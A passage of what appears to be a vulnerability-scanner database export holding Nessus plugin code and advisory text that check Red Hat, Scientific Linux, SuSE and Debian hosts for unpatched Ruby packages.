exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1581\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ruby-debuginfo-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ruby-devel-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-docs-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-docs-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-docs-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-irb-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-irb-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-irb-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ruby-libs-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-rdoc-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-rdoc-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-rdoc-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-ri-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-ri-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-ri-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-static-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-static-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-static-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ruby-tcltk-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ruby-tcltk-1.8.7.352-3.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ruby-tcltk-1.8.7.352-3.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-debuginfo / ruby-devel / ruby-docs / ruby-irb / etc\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:47:06", "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to do system management tasks.\n\nA denial of service flaw was found in the implementation of associative arrays (hashes) in Ruby. An attacker able to supply a large number of inputs to a Ruby application (such as HTTP POST request parameters sent to a web application) that are used as keys when inserting data into an array could trigger multiple hash function collisions, making array operations take an excessive amount of CPU time. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions. (CVE-2011-4815)\n\nIt was found that Ruby did not reinitialize the PRNG (pseudorandom number generator) after forking a child process. This could eventually lead to the PRNG returning the same result twice. An attacker keeping track of the values returned by one child process could use this flaw to predict the values the PRNG would return in other child processes (as long as the parent process persisted). (CVE-2011-3009)\n\nAll users of ruby are advised to upgrade to these updated packages, which contain backported patches to resolve these issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : ruby on SL4.x, SL5.x i386/x86_64 (20120130)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-3009", "CVE-2011-4815"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:irb", "p-cpe:/a:fermilab:scientific_linux:ruby", "p-cpe:/a:fermilab:scientific_linux:ruby-debuginfo", "p-cpe:/a:fermilab:scientific_linux:ruby-devel", "p-cpe:/a:fermilab:scientific_linux:ruby-docs", "p-cpe:/a:fermilab:scientific_linux:ruby-irb", "p-cpe:/a:fermilab:scientific_linux:ruby-libs", "p-cpe:/a:fermilab:scientific_linux:ruby-mode", "p-cpe:/a:fermilab:scientific_linux:ruby-rdoc", "p-cpe:/a:fermilab:scientific_linux:ruby-ri", "p-cpe:/a:fermilab:scientific_linux:ruby-tcltk", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120130_RUBY_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61228", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61228);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-4815\");\n\n script_name(english:\"Scientific Linux Security Update : ruby on SL4.x, SL5.x i386/x86_64 (20120130)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ruby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nA denial of service flaw was found in the implementation of\nassociative arrays (hashes) in Ruby. An attacker able to supply a\nlarge number of inputs to a Ruby application (such as HTTP POST\nrequest parameters sent to a web application) that are used as keys\nwhen inserting data into an array could trigger multiple hash function\ncollisions, making array operations take an excessive amount of CPU\ntime. To mitigate this issue, randomization has been added to the hash\nfunction to reduce the chance of an attacker successfully causing\nintentional collisions. (CVE-2011-4815)\n\nIt was found that Ruby did not reinitialize the PRNG (pseudorandom\nnumber generator) after forking a child process. This could eventually\nlead to the PRNG returning the same result twice. An attacker keeping\ntrack of the values returned by one child process could use this flaw\nto predict the values the PRNG would return in other child processes\n(as long as the parent process persisted). (CVE-2011-3009)\n\nAll users of ruby are advised to upgrade to these updated packages,\nwhich contain backported patches to resolve these issues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1201&L=scientific-linux-errata&T=0&P=2427\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?defcefc9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"irb-1.8.1-18.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-1.8.1-18.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-debuginfo-1.8.1-18.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-devel-1.8.1-18.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-docs-1.8.1-18.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-libs-1.8.1-18.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-mode-1.8.1-18.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-tcltk-1.8.1-18.el4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"ruby-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-debuginfo-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-devel-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-docs-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-irb-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-libs-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-mode-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-rdoc-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-ri-1.8.5-22.el5_7.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-tcltk-1.8.5-22.el5_7.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-debuginfo / ruby-devel / ruby-docs / ruby-irb / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:55:22", "description": "The ruby interpreter received a fix for two security issues :\n\n - Ruby's $SAFE mechanism enables untrusted user codes to run in $SAFE >= 4 mode. This is a kind of sandboxing so some operations are restricted in that mode to protect other data outside the sandbox. (CVE-2012-4466)\n\n The problem found was around this mechanism.\n Exception#to_s, NameError#to_s, and name_err_mesg_to_s() interpreter-internal API was not correctly handling the $SAFE bits so a String object which is not tainted can destructively be marked as tainted using them. By using this an untrusted code in a sandbox can modify a formerly-untainted string destructively.\n\n http://www.ruby-lang.org/en/news/2012/10/12/cve-2012-446 4-cve-2012-4466/\n\n - Ruby before 1.8.7-p352 does not reset the random seed upon forking, which makes it easier for context-dependent attackers to predict the values of random numbers by leveraging knowledge of the number sequence obtained in a different child process.\n (CVE-2011-2686)\n\n - Fix entity expansion DoS vulnerability in REXML. When reading text nodes from an XML document, the REXML parser could be coerced into allocating extremely large string objects which could consume all available memory on the system. (CVE-2013-1821)", "cvss3": {"score": null, "vector": null}, "published": "2013-04-04T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : ruby (ZYPP Patch Number 8524)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2012-4464", "CVE-2012-4466", "CVE-2012-4522", "CVE-2013-1821"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_RUBY-8524.NASL", "href": "https://www.tenable.com/plugins/nessus/65799", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65799);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-2686\", \"CVE-2012-4464\", \"CVE-2012-4466\", \"CVE-2012-4522\", \"CVE-2013-1821\");\n\n script_name(english:\"SuSE 10 Security Update : ruby (ZYPP Patch Number 8524)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The ruby interpreter received a fix for two security issues :\n\n - Ruby's $SAFE mechanism enables untrusted user codes to\n run in $SAFE >= 4 mode. This is a kind of sandboxing so\n some operations are restricted in that mode to protect\n other data outside the sandbox. (CVE-2012-4466)\n\n The problem found was around this mechanism.\n Exception#to_s, NameError#to_s, and name_err_mesg_to_s()\n interpreter-internal API was not correctly handling the\n $SAFE bits so a String object which is not tainted can\n destructively be marked as tainted using them. By using\n this an untrusted code in a sandbox can modify a\n formerly-untainted string destructively.\n\n http://www.ruby-lang.org/en/news/2012/10/12/cve-2012-446\n 4-cve-2012-4466/\n\n - Ruby before 1.8.7-p352 does not reset the random seed\n upon forking, which makes it easier for\n context-dependent attackers to predict the values of\n random numbers by leveraging knowledge of the number\n sequence obtained in a different child process.\n (CVE-2011-2686)\n\n - Fix entity expansion DoS vulnerability in REXML. When\n reading text nodes from an XML document, the REXML\n parser could be coerced into allocating extremely large\n string objects which could consume all available memory\n on the system. (CVE-2013-1821)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-4464.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-4466.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-4522.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1821.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8524.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"ruby-1.8.6.p369-0.14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-04T02:47:16", "description": "CVE-2011-0188 The VpMemAlloc function in bigdecimal.c in the BigDecimal class in Ruby 1.9.2-p136 and earlier, as used on Apple Mac OS X before 10.6.7 and other platforms, does not properly allocate memory, which allows context-dependent attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving creation of a large BigDecimal value within a 64-bit process, related to an 'integer truncation issue.'\n\nCVE-2011-2705 use upstream SVN r32050 to modify PRNG state to prevent random number sequence repeatation at forked child process which has same pid. Reported by Eric Wong.\n\nCVE-2012-4522 The rb_get_path_check function in file.c in Ruby 1.9.3 before patchlevel 286 and Ruby 2.0.0 before r37163 allows context-dependent attackers to create files in unexpected locations or with unexpected names via a NUL byte in a file path.\n\nCVE-2013-0256 darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before 4.0.0.preview2.1, as used in Ruby, does not properly generate documents, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted URL.\n\nCVE-2013-2065 (1) DL and (2) Fiddle in Ruby 1.9 before 1.9.3 patchlevel 426, and 2.0 before 2.0.0 patchlevel 195, do not perform taint checking for native functions, which allows context-dependent attackers to bypass intended $SAFE level restrictions.\n\nCVE-2015-1855 OpenSSL extension hostname matching implementation violates RFC 6125\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2015-06-01T00:00:00", "type": "nessus", "title": "Debian DLA-235-1 : ruby1.9.1 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0188", "CVE-2011-2705", "CVE-2012-4522", "CVE-2013-0256", "CVE-2013-2065", "CVE-2015-1855"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libruby1.9.1", "p-cpe:/a:debian:debian_linux:libruby1.9.1-dbg", "p-cpe:/a:debian:debian_linux:libtcltk-ruby1.9.1", "p-cpe:/a:debian:debian_linux:ri1.9.1", "p-cpe:/a:debian:debian_linux:ruby1.9.1", "p-cpe:/a:debian:debian_linux:ruby1.9.1-dev", "p-cpe:/a:debian:debian_linux:ruby1.9.1-elisp", "p-cpe:/a:debian:debian_linux:ruby1.9.1-examples", "p-cpe:/a:debian:debian_linux:ruby1.9.1-full", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-235.NASL", "href": "https://www.tenable.com/plugins/nessus/83907", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-235-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83907);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0188\", \"CVE-2011-2705\", \"CVE-2012-4522\", \"CVE-2013-0256\", \"CVE-2013-2065\", \"CVE-2015-1855\");\n script_bugtraq_id(46950, 46966, 49015, 56115, 57785, 59881, 74446);\n\n script_name(english:\"Debian DLA-235-1 : ruby1.9.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2011-0188 The VpMemAlloc function in bigdecimal.c in the\nBigDecimal class in Ruby 1.9.2-p136 and earlier, as used on Apple Mac\nOS X before 10.6.7 and other platforms, does not properly allocate\nmemory, which allows context-dependent attackers to execute arbitrary\ncode or cause a denial of service (application crash) via vectors\ninvolving creation of a large BigDecimal value within a 64-bit\nprocess, related to an 'integer truncation issue.'\n\nCVE-2011-2705 use upstream SVN r32050 to modify PRNG state to prevent\nrandom number sequence repeatation at forked child process which has\nsame pid. Reported by Eric Wong.\n\nCVE-2012-4522 The rb_get_path_check function in file.c in Ruby 1.9.3\nbefore patchlevel 286 and Ruby 2.0.0 before r37163 allows\ncontext-dependent attackers to create files in unexpected locations or\nwith unexpected names via a NUL byte in a file path.\n\nCVE-2013-0256 darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before\n4.0.0.preview2.1, as used in Ruby, does not properly generate\ndocuments, which allows remote attackers to conduct cross-site\nscripting (XSS) attacks via a crafted URL.\n\nCVE-2013-2065 (1) DL and (2) Fiddle in Ruby 1.9 before 1.9.3\npatchlevel 426, and 2.0 before 2.0.0 patchlevel 195, do not perform\ntaint checking for native functions, which allows context-dependent\nattackers to bypass intended $SAFE level restrictions.\n\nCVE-2015-1855 OpenSSL extension hostname matching implementation\nviolates RFC 6125\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/05/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/ruby1.9.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.9.1-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtcltk-ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ri1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-elisp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-full\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libruby1.9.1\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libruby1.9.1-dbg\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libtcltk-ruby1.9.1\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ri1.9.1\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.9.1\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.9.1-dev\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif 